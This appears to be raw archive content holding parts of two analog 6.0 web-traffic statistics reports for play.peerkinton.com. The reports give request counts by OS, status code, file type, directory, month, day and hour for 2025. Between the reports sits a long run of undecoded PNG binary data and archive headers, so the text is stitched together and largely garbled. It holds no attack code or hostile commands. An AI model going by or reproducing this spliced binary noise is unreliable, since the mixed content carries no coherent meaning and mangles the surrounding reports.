Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">90</td><td class="P">65</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">61</td><td class="P">37</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">61</td><td class="P">37</td><td class="xl"> Linux</td></tr> <tr><td class="N">3</td><td class="R">80</td><td class="P">32</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">60</td><td class="P">20</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">20</td><td class="P">12</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">4</td><td class="R">46</td><td class="P">29</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">292</td><td class="xl">200 OK</td></tr> <tr><td class="R">26</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">267</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">19</td><td class="b"> 0.58%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">175</td><td class="b">37.43%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">98</td><td class="b">61.98%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">178</td><td class="b">54.92%</td><td class="xl">[directories]</td></tr> <tr><td class="R">56</td><td class="b">31.78%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">21</td><td class="b"> 9.93%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">18</td><td class="b"> 2.79%</td><td class="xl">.svg</td></tr> <tr><td class="R">19</td><td class="b"> 0.58%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">178</td><td class="b">54.92%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">95</td><td class="b">44.50%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">19</td><td class="b"> 0.58%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">178</td><td class="b">54.92%</td><td class="D">Oct/31/25 11:38 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">19</td><td class="b"> 5.61%</td><td class="D">Sep/27/25 12:22 AM</td><td class="xl"> <a href="/?192.175.111.253">/?192.175.111.253</a></td></tr> <tr class="sub level2"><td class="R">13</td><td class="b"> 4.32%</td><td class="D">Oct/31/25 11:38 AM</td><td class="xl"> <a href="/?3.249.222.231">/?3.249.222.231</a></td></tr> <tr><td class="R">28</td><td class="b"> 3.93%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">28</td><td class="b">27.85%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">21</td><td class="b"> 9.93%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">37</td><td class="b"> 3.37%</td><td class="D">Oct/27/25 12:49 PM</td><td class="xl">[not listed: 9 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK HG�[,��v� � browrep.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� JIDATx�흿����7 NE�"�U�{_����s+alEL�L�*3SEV���X�w�`�nt�ocvfown�[��Yf�m�z�^`V}�0��R��n����o�n�^=�ׇk �n���&�˨��Xr;` �k�Xv��ր��5`�;` �k�Xv��ր��5`�;` ���j�r�v,͓�k���bX��=�v�֛���BX�[����7{��%�4AEa���wX�w��8,�Y%�v��QX�><4a9-nx��j�� a�}�W)��J%X��f�q~V&� � g�H6K�X�a��e��U�`��=*Q���:�=*Q����*Q ��g��_B �ʪkwC!�Z�j�����_�o�%L��ڰ$a+�2*��6�1� �����5 ˧�K�L孚X�z����,�-r/% o%�{V��p ���s�OD�Z�ڰ�a+²�7Lt%CϷ���Ha��"XXB��z��a�x�1ڪIt<kz�`Y�6�O{�����:�L� o1Xs��ΰ4l1N�3�6�z����`�VV7l1X���2t,>��+ �hb�?�9�p/Z����{n�vEj�j����X�b�q��A�X a�Ф<�m,�r�3��v�Ű��W+1����:BLa��$*�0,�zVjVh0uO�@1� � OI �#�>��SX�Â���eh}pIDh���Z���q��5D|&�x<%����Bd�B��`<�3\5��-GG��[ec1�o{��?7aj�,��s��uM�Z&�pB?���H�ک��J7���$�6J��<� �J���F, ��$k:��"��K�� K�X"X;ɚ�a Kk'����9��6�[ۚ���B)��#�-�Yq��)ݖnΫ�$K�~A,�b����YqGػ��J����`ID(�Ub��E>K�h ����r4��+��E>K�(*<����`KǪ9V7� S�V-j1X����c���)N�V���9�V͵X�Z=��;"�bz��8a���X=XB�ê�V k�|VOoA6&z�b�:1�`����g�!�5�[Z+��V(�%T�VE������V9��n�Z� �Ò:�Vٵd=�Jo�p��U��j�n�c�Zn��ș�6ު�P�G�5Xb��u�ր�`�U8 ��uX�%w�X%�z����7t �"X�|V�����4��H��o��X����A�#����U8���,C{�i>�#}�b�HC�F�q��N;�⨓V� ��O�k���`\+��,�c2X8�ÍF�l,�"�V�u\5���k�%�g�b�7�!?E�V%�T��n#,W��JԄCwd8��!X2X�|�<��Q���E�&�a S�<@�1f��P��نC?�¬I�d�,?�)��"� ,Eb<wO���Z"�ǃ��Y� �39�]%9�xa��2�C�a������w���pQ�|V��SqK�� -��g��@�`�J�a�8�@��ٻw�2�b�$�,/C:�*>�M"�(�.��Gj���J|��r�fV-X-��[2��!{��H��!��ݙYtxCv)X��k��` �,�,`UZ7d�EX� ֘ %p �L����->�. ��j��g�n��S�ޘ���|V�|m���b��B>��}�6,�j���m䳒�Q�X��²�%-����, �uLCV��j�__���.x��JY�aI�gi��TC��"��q�MV-���·���j��8J�u�T\ ��dMV#��A�Vb�`�j��Y�A��,I>=p�tB>���,��gŸY�Yk�*���泆`tF�b5�U�g��Va ����*�a +^��P bV(��y �;��ɇ��p���ʬZ���������WTB=t�`��$�hk�Hbk[XVUX-+u�YW��)�e��]#Ŷ�Ucuã��`UY� ��Ű�M�� ��6������� ��O�y�F/��h|/�j�J"|��E>K� ��C�E,��jb&+��և�cՇ�zIg峰�f�������Ղ,X軗�� �˪k�|�����$�A�g>��k�곪z��,�!��Lq�1&�!f�T�m K��k�|B!�X~e��!,�"���uX�CK_Y�Z?����P��Y��O~p,f[��j�Z9��h��ːb�Ò�jÊg٨p���Y+�9,���`�N?����,X2V X��s{�^���1��(v&���:V=� �ղRaI>k�a/l=XRV�;8\���k��k�Փ�5���b�a���_o�"[��,: ��7d]%�zC��_���|�� �Y�a�^Ri���r��8|I b=�)-��փeU�%�g�<��bf"�ᔖ�l�R k8C�p�l����7�k��w����x��r{VJK�&�qϲv-��B� ��@�������`{X��vX��&6xf���bI�uVJˬkr,���}���z�VPJ�9)�0n-X�ci��?,�e��ᬭNal,�` 礴4Y�x>,c�[��['�b�x���;���E���(4g��<���YV� ևo�U�R-.�^���߫w��`�}����GOK��':6<����,D�s=MX�_�������s�q=MX��/����?M���$Z|��&�����EZ]->IX� ��N�(ľs1X�8������u���K+ ����<T~��n���:2;�s�߾���� ֤C�Zm-V`�0ŏ9�ׂ�ӄcU���-�E39���S�Z--�RX�ʰ�L����l9��S!�r�e9�����ܵ]�h�Ԡ���2òα~��+�0bU�uX��c I�3z8*�4-�n�$�ɱ",��T�5-�`i2�S%� 7�8�M� ��W�B�Uv��sU=�ː����r�kR!����w��l ��5X��� ;�r^�����ce� B̵X����<����)E��a;[�9�Y�$�T�5X�uH\֭T�(h�� 'X�NM�~��p-�\�6^�F��ǚT�ª��t]�-�u�`���uX��\�O��XN�Vp����,p,�),�ZU!���{9�_sXs� ��5k1I�}q����y��ÚE*d���u�E~�&y��gѕ���Y������`=��[B|�>i] 띯v���<Y�����c�a5�X�������__��HRm�N �3�6]��Y�?�k����A�;֬B�-�k��|���A�±`��Eϒ�?���ϹV։�0���U�� X[�?��Y�g5a�*��:��k�1�Ղ�3�X��`�� ��@a��B���ϊ�7x��X�z��jEx�Xs�Ja�]+�z1X��?�Y�Y-�:�a��]�L+u,a��AX���d�F� � �UUb�l�=s�2��ò��u,k��C����`U"<�0�zуUt-a��N+�*�8�W���<��uX��7�X�ǚUX�E\�� uvse��Lcϵ"��OBXĵr!�*��BǏ�_x� h��Q<OQ�xi;�M+�0��)���V�i��X���qh����1S��n̊�X�V�X>daf�QX�f�R K6�;���+Z�XuX%&B,�wW�� k �f�� >H����u(cp���@Q���CV�,��]딨��RXԵ~�8��LŚ���B^��t�����0��R\��q�F�AaB�� ��!��2��!+��\��]� +�+��9N�@DXڄՂ&�,~ѻIH��0r��[q8= +��I���mrX����<K�Fa^� ˨,�",����<*��� k��k٦c��:�U�E9��2�����䑼�0�l�}��� d�������:$B�¢y(��%ȐN���4��f��8�p�|Y���!M~�XY��ێՆ�t�X�lӃ�,q�Z���k�X>dUa�]����7���L�lw%�BX�9,Z�k}�Ȱֲ*,�r��B!� ���88��uZ �����K �8�0�]��J��gX��X!d5`�UQ�\�6m�jV�\�:VVU�S��8V�E����?+���/q�<�Ҋ��Ι��`��N���D��`�^��E��s�v��z�H`�,<J"��X +t����P��DX��?��{�06qƖ?m:��������A�C-��Z�Y�~��#(s��ȗ;VT!����zXa�aa!6f��YEX�]1�@v�,��XuXUVG,fa�<k�������Y$�-��͖�{�j�Xe���ϒâӯ�ϊ���>�`�;�),��@$�����o*�I%�+��~Hxt�?9#��tQ�Y�!¢A�ı8�U��k�)y�����*�z���,�E�V��Y-���C���mX��Ѷ^�u`� K�h�B.��� �K�ܱİ��"�-�B! a1~ܕ�t�BYBX�q,1��X�ͪ��:lG�9��u��ua��E+�0]x�>�+� KWk}Xs�Z˹V��t����4WaV��^�ag�&!RNJ�] �c7�3XfQ���I`��rX]GI=+̓�J��Eƞ�łV�ɹ� Ʈ�D��^K �,s��KKY9,���@+N��B�RY�] ��T��"�o�B���/��>�`�Z��<�TX��I�n�İ l�aI֍���/9,��*����.c�f%��U�5��iP��rJ�ڡ� �I�/�>}ܣ�(,�E���j��s�²��W�FaMR�"=:�a����B)a�V�����h+�.|��K�X�M�(�ڳg[��J`�ܫ�-�5���s������������|XO�Xv��ր��5`�;` �k�Xv��րe��jm62n��l�Nv(�D.yݝ�t-�e��jy�`eL|ᰌ ���oz.n� �R�����`�����=qw�3�1�5���aX��τ��/��� �f�;��:��!�;*T3,(��L��Z ��c�w�<ThW,��5������O�����(Mv,�"qR^��s9+�pj�� Z��^�-��v^�iU�EkS\F4�3A�k9���G���/��sA���O]�п��y<u�Y�� �Kh;�g���X&�P 9�KZ ��f����\EXA K+�i���;�(C<Z����2X>�\V�eXY1fk�g� ��v���h��y�!HY�`�uά�N�#���?`[,T������W�GQ�M6ܩ|��S]���`]���~� �v��ր��5`�;` �k�Xv��ր��5`�;` ��e�����0��M�꿲}��u8���?�~Xb��f�́�� IEND�B`�PK HG�[;���>� >� 12.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for play.peerkinton.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://play.peerkinton.com/">play.peerkinton.com</a></h1> <p class="analysisspan">Program started on Tue, Dec 02 2025 at 12:09 PM. <br />Analyzed requests from Sat, Jun 21 2025 at 7:24 PM to Mon, Dec 01 2025 at 3:24 PM (162.83 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Dec 02 2025 at 12:09 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 326 (5) <br /><span class="gensumtitle">Average successful requests per day:</span> 1 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 212 (5) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 1,094 (2) <br /><span class="gensumtitle">Redirected requests:</span> 3 (1) <br /><span class="gensumtitle">Distinct files requested:</span> 27 (650) <br /><span class="gensumtitle">Distinct hosts served:</span> 173 (208) <br /><span class="gensumtitle">Data transferred:</span> 280.30 kilobytes (1.53 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.72 kilobytes (224 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2025</td><td class="R">73</td><td class="P">36</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">36</td><td class="P">32</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">59</td><td class="P">36</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">28</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Oct 2025</td><td class="R">97</td><td class="P">53</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2025</td><td class="R">31</td><td class="P">31</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">Dec 2025</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Oct 2025 (53 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">37</td><td class="P">35</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">25</td><td class="P">17</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">56</td><td class="P">39</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">25</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">Thu</td><td class="R">50</td><td class="P">25</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">34</td><td class="P">24</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">99</td><td class="P">56</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">14</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">21</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">22</td><td class="P">20</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 4</td><td class="R">7</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 7</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">8</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 9</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">11</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">22</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">21</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">14</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">15</td><td class="R">5</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">17</td><td class="R">12</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">18</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">89</td><td class="P">30</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">10</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">25</td><td class="P">9</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">3</td><td 